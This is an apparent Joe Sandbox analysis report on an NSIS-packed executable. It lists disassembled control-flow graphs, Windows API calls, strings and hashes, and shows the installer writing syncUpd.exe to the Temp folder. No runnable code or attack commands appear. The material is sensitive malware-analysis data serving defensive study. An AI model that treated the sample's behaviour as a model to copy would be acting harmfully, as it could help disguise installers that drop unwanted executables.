8380->8381 8382 403025 RegCloseKey 8380->8382 8381->8382 8386 407be3 wsprintfA 8381->8386 8382->8383 8386->8382 7921 401aa5 7922 401400 18 API calls 7921->7922 7923 401aaa SearchPathA 7922->7923 7925 402dab 7923->7925 7924 4036c5 7925->7924 7929 407be3 wsprintfA 7925->7929 7927 40347d 7930 407cb6 lstrcpynA 7927->7930 7929->7927 7930->7924 8387 4031a6 8388 401456 18 API calls 8387->8388 8390 4031b3 8388->8390 8389 403831 8390->8389 8391 4031f8 WriteFile 8390->8391 8392 4097a6 8393 408cf0 8392->8393 8394 408a96 8392->8394 8394->8393 8395 408b69 GlobalAlloc 8394->8395 8396 408b4d GlobalFree 8394->8396 8397 408c55 GlobalAlloc 8394->8397 8398 408c45 GlobalFree 8394->8398 8395->8393 8395->8394 8396->8395 8397->8393 8397->8394 8398->8397 8399 405bab 8400 405bc1 8399->8400 8401 405be9 8399->8401 8409 407805 GetDlgItemTextA 8400->8409 8403 405c39 8401->8403 8404 405bee SHGetPathFromIDListA 8401->8404 8405 405c04 8404->8405 8406 405bd1 SendMessageA 8404->8406 8408 403903 2 API calls 8405->8408 8406->8403 8408->8406 8409->8406 8127 40272e 8128 401400 18 API calls 8127->8128 8129 402733 8128->8129 8130 408299 5 API calls 8129->8130 8131 402746 8130->8131 8132 40277c GlobalAlloc 8131->8132 8135 402a3c 8131->8135 8133 402799 8132->8133 8132->8135 8134 408299 5 API calls 8133->8134 8136 4027a5 8134->8136 8137 408299 5 API calls 8136->8137 8140 4027b8 8137->8140 8138 4027e5 GlobalFree 8138->8135 8140->8138 8144 407be3 wsprintfA 8140->8144 8142 40282d 8145 407be3 wsprintfA 8142->8145 8144->8142 8145->8138 7740 401e30 7741 401400 18 API calls 7740->7741 7742 401e35 7741->7742 7747 407cde lstrlenA 7742->7747 7748 403432 7749 401400 18 API calls 7748->7749 7750 403437 FindFirstFileA 7749->7750 7751 403452 7750->7751 7756 407be3 wsprintfA 7751->7756 7753 40347d 7757 407cb6 lstrcpynA 7753->7757 7755 4036c5 7756->7753 7757->7755 7758 403235 7759 401456 18 API calls 7758->7759 7763 40323c 7759->7763 7760 40326b ReadFile 7760->7763 7766 4032d8 7760->7766 7761 4032bf 7767 407be3 wsprintfA 
7761->7767 7763->7760 7763->7761 7764 4032ef 7763->7764 7763->7766 7765 4032fb SetFilePointer 7764->7765 7764->7766 7765->7766 7767->7766 7931 4020b5 7932 401400 18 API calls 7931->7932 7933 4020ba 7932->7933 7934 401456 18 API calls 7933->7934 7935 4020c9 wsprintfA 7934->7935 7936 40382f 7935->7936 8410 4057b5 8411 4057d0 8410->8411 8412 40597b 8410->8412 8415 404d65 18 API calls 8411->8415 8413 405987 8412->8413 8414 405a0b 8412->8414 8420 4059b0 GetDlgItem SendMessageA 8413->8420 8436 405a06 8413->8436 8416 405a14 GetDlgItem 8414->8416 8414->8436 8417 40583a 8415->8417 8418 405b02 8416->8418 8422 405a37 8416->8422 8421 404d65 18 API calls 8417->8421 8424 405b14 8418->8424 8418->8436 8419 404f0f 8 API calls 8423 405b9a 8419->8423 8447 404d44 EnableWindow 8420->8447 8426 405857 CheckDlgButton 8421->8426 8422->8418 8427 405a65 SendMessageA 8422->8427 8428 405b43 8424->8428 8429 405b1a SendMessageA 8424->8429 8444 404d44 EnableWindow 8426->8444 8435 405aa2 SetCursor ShellExecuteA 8427->8435 8428->8423 8432 405b4e SendMessageA 8428->8432 8429->8428 8430 405a00 8448 404d05 SendMessageA 8430->8448 8432->8423 8434 405880 GetDlgItem 8445 404c96 SendMessageA 8434->8445 8439 405afa SetCursor 8435->8439 8436->8419 8438 4058a1 SendMessageA 8440 4058e0 SendMessageA SendMessageA 8438->8440 8441 4058d4 GetSysColor 8438->8441 8439->8418 8446 407cde lstrlenA 8440->8446 8441->8440 8444->8434 8445->8438 8447->8430 8448->8436 8449 402db6 8450 402e00 8449->8450 8451 402dbf 8449->8451 8453 401400 18 API calls 8450->8453 8452 4015b0 19 API calls 8451->8452 8454 402dcb 8452->8454 8455 402e0c 8453->8455 8456 401400 18 API calls 8454->8456 8459 402a3c 8454->8459 8460 401482 RegOpenKeyExA 8455->8460 8458 402de2 RegDeleteValueA RegCloseKey 8456->8458 8458->8459 8462 4014ca 8460->8462 8467 401561 8460->8467 8461 401540 RegCloseKey 8464 408299 5 API calls 8461->8464 8462->8461 8463 401511 RegCloseKey 8462->8463 8465 401482 5 API calls 8462->8465 8463->8467 8466 40155c 8464->8466 8465->8462 
8466->8467 8468 40158f RegDeleteKeyA 8466->8468 8467->8459 8468->8467 8146 401737 8147 406fcb 23 API calls 8146->8147 8148 401747 8147->8148 8469 401db7 8470 401e0c 8469->8470 8471 401400 18 API calls 8470->8471 8472 401e11 8471->8472 8473 4085b8 63 API calls 8472->8473 8474 401e24 8473->8474 8149 402d3b 8150 401400 18 API calls 8149->8150 8151 402d4a 8150->8151 8152 401400 18 API calls 8151->8152 8153 402d59 8152->8153 8154 401400 18 API calls 8153->8154 8155 402d6c GetPrivateProfileStringA 8154->8155 8156 402dab 8155->8156 8160 4036c5 8156->8160 8161 407be3 wsprintfA 8156->8161 8158 40347d 8162 407cb6 lstrcpynA 8158->8162 8161->8158 8162->8160 8163 40573f 8164 405792 8163->8164 8165 405759 8163->8165 8166 404f0f 8 API calls 8164->8166 8167 404d65 18 API calls 8165->8167 8168 4057a8 8166->8168 8169 405770 8167->8169 8171 4077fb SetDlgItemTextA 8169->8171 8475 401fbf 8476 401456 18 API calls 8475->8476 8477 401fc4 8476->8477 8478 401456 18 API calls 8477->8478 8479 401fd3 8478->8479

Control-flow Graph

APIs
• SetErrorMode.KERNELBASE ref: 00404388
• GetVersion.KERNEL32 ref: 0040438F
• lstrlenA.KERNEL32 ref: 004043CC
• InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
• OleInitialize.OLE32 ref: 00404405
• SHGetFileInfoA.SHELL32 ref: 0040443A
• GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
• CharNextA.USER32 ref: 004044B1
  • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• GetTempPathA.KERNELBASE(00000001,00000001), ref: 0040456F
• DeleteFileA.KERNELBASE ref: 0040458D
• GetWindowsDirectoryA.KERNEL32 ref: 004045B6
• OleUninitialize.OLE32(?,00000000), ref: 0040481C
• ExitProcess.KERNEL32 ref: 004049AC
  • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
• GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
• ExitWindowsEx.USER32 ref: 00404953
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
  • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
Strings
Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$"C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe" $%$($@Vl$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
                                                                                                                                                                                                                                                              • API String ID: 3796326152-2889975713
                                                                                                                                                                                                                                                              • Opcode ID: d7153d4af7879aacc660eb0a76c3a013205ac95021754220d5a6f64903ba5e58
                                                                                                                                                                                                                                                              • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7153d4af7879aacc660eb0a76c3a013205ac95021754220d5a6f64903ba5e58
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 147 4060fd-40611a call 408299 150 406136-406176 call 407b3a 147->150 151 40611c-406131 call 407be3 147->151 155 4061a7-4061b6 call 407ce8 150->155 156 406178-4061a4 call 407b3a 150->156 161 4061bb-4061e8 call 404ae0 call 40815b 151->161 155->161 156->155 167 4062be-4062cd call 40815b 161->167 168 4061ee-4061f3 161->168 174 4062e7-406329 LoadImageA 167->174 175 4062cf-4062e6 call 407e06 167->175 168->167 170 4061f9-406232 call 407b3a 168->170 170->167 176 406238-40623f 170->176 178 406405-40640c call 403903 174->178 179 40632f-40636b RegisterClassA 174->179 175->174 180 406241-40625c call 4078a4 176->180 181 40625f-40626e call 407cde 176->181 186 406411-406416 178->186 183 406374-406400 SystemParametersInfoA CreateWindowExA 179->183 184 40636d-40636f 179->184 180->181 195 406270-406285 lstrcmpiA 181->195 196 4062a3-4062bd call 407cf2 call 407cb6 181->196 183->178 189 40654e-406556 184->189 190 40653a-40653f 186->190 191 40641c-406428 call 404ae0 186->191 190->189 201 406513-406522 call 404c0d 191->201 202 40642e-406455 ShowWindow call 40820e 191->202 195->196 199 406287-406294 GetFileAttributesA 195->199 196->167 203 406296-406298 199->203 204 40629a-4062a2 call 4078ce 199->204 213 406541-406548 call 403903 201->213 214 406524-40652b 201->214 215 406464-406488 GetClassInfoA 202->215 216 406457-406463 call 40820e 202->216 203->196 203->204 204->196 224 40654d 213->224 214->190 217 40652d-406539 call 403903 214->217 220 40648a-4064bd GetClassInfoA RegisterClassA 215->220 221 4064be-406511 DialogBoxParamA call 403903 call 4049b4 215->221 216->215 217->190 220->221 221->224 224->189
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 00406361
                                                                                                                                                                                                                                                              • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 0040643E
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 004064B7
                                                                                                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$_Nb$g
                                                                                                                                                                                                                                                              • API String ID: 3995538257-3487636860
                                                                                                                                                                                                                                                              • Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 230 403f03-403f6d GetTickCount GetModuleFileNameA call 407a78 233 4042b1-4042b8 230->233 234 403f73-403fc4 call 407cb6 call 4078ce call 407cb6 GetFileSize 230->234 241 403fce-403fd0 234->241 242 4040c3-4040d6 call 4039fe 241->242 243 403fd6-403ffb call 403ae9 241->243 250 4040d8 242->250 251 40412d-40413a 242->251 246 404000-404004 243->246 248 404006-404012 call 4039fe 246->248 249 404017-40401e 246->249 257 404168-40416d 248->257 252 404024-404050 call 407a23 249->252 253 4040ed-4040f1 249->253 250->257 254 404172-4041f0 GlobalAlloc call 408904 call 407ad4 CreateFileA 251->254 255 40413c-404144 call 403b31 251->255 259 4040ff-404105 252->259 271 404056-404060 252->271 258 4040f3-4040fa call 4039fe 253->258 253->259 254->233 278 4041f6-40424b call 403b31 call 403d52 254->278 269 404149-40415e call 403ae9 255->269 257->233 258->259 267 404120-404128 259->267 268 404107-40411e call 408898 259->268 267->241 268->267 269->257 280 404160-404166 269->280 271->259 275 404066-404070 271->275 275->259 279 404076-404080 275->279 287 404250-404259 278->287 279->259 282 404082-40408c 279->282 280->254 280->257 282->259 284 40408e-4040b1 282->284 284->257 286 4040b7-4040bb 284->286 288 4040dd-4040eb 286->288 289 4040bd-4040c1 286->289 287->257 290 40425f-404273 287->290 288->259 289->242 289->288 291 404275 290->291 292 40427b 290->292 291->292 293 404280-404281 292->293 294 404283-404287 293->294 295 404289-4042ae call 407a23 293->295 294->293 295->233
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE ref: 00404183
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Inst, xrefs: 00404066
                                                                                                                                                                                                                                                              • lWl, xrefs: 004042A0
                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                                              • @, xrefs: 00404294
                                                                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                                              • @Vl, xrefs: 00404266
• Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                                              • soft, xrefs: 00404076
                                                                                                                                                                                                                                                              • Null, xrefs: 00404082
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
• String ID: @$@Vl$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$lWl$soft
                                                                                                                                                                                                                                                              • API String ID: 3119619987-1405107949
                                                                                                                                                                                                                                                              • Opcode ID: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\syncUpd.exe$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exe Click Abort to stop the installation, Retry to try again, or Ignore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 645384303-1569426528
                                                                                                                                                                                                                                                              • Opcode ID: 39f1cc7eb277374050ac61fcdd2f2c3b11c7e06bae893a1bc1b2b4b0adb3845a
                                                                                                                                                                                                                                                              • Instruction ID: 5f2d288321653f80e71b8b11b89773680788b89a4638a57d45da6de8162f07b1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39f1cc7eb277374050ac61fcdd2f2c3b11c7e06bae893a1bc1b2b4b0adb3845a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA6141B09087009FD710BF65CA45A6FBAF8EF80714F118A2FF485A7291D77C58918B6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function at 00403D52 (legend: Executed / Not Executed); graph not reproduced]
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Read$PointerWrite
                                                                                                                                                                                                                                                              • String ID: PB@
                                                                                                                                                                                                                                                              • API String ID: 2113905535-661560245
                                                                                                                                                                                                                                                              • Opcode ID: ac68a1f51fa2d24e3935b3f5087da11d05715ce400863ada3ca60dca7cc7719e
                                                                                                                                                                                                                                                              • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac68a1f51fa2d24e3935b3f5087da11d05715ce400863ada3ca60dca7cc7719e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function at 00403B63 (legend: Executed / Not Executed); graph not reproduced]
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNELBASE ref: 00403B56
                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE ref: 00403BCB
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE ref: 00403CB8
                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE ref: 00403D2F
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                                                                                                                                                              • String ID: @Vl
                                                                                                                                                                                                                                                              • API String ID: 1725291646-658408307
                                                                                                                                                                                                                                                              • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 439 40820e-40823a GetSystemDirectoryA 440 40824b-40824d 439->440 441 40823c-408249 439->441 442 408252-408296 wsprintfA LoadLibraryExA 440->442 441->442
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
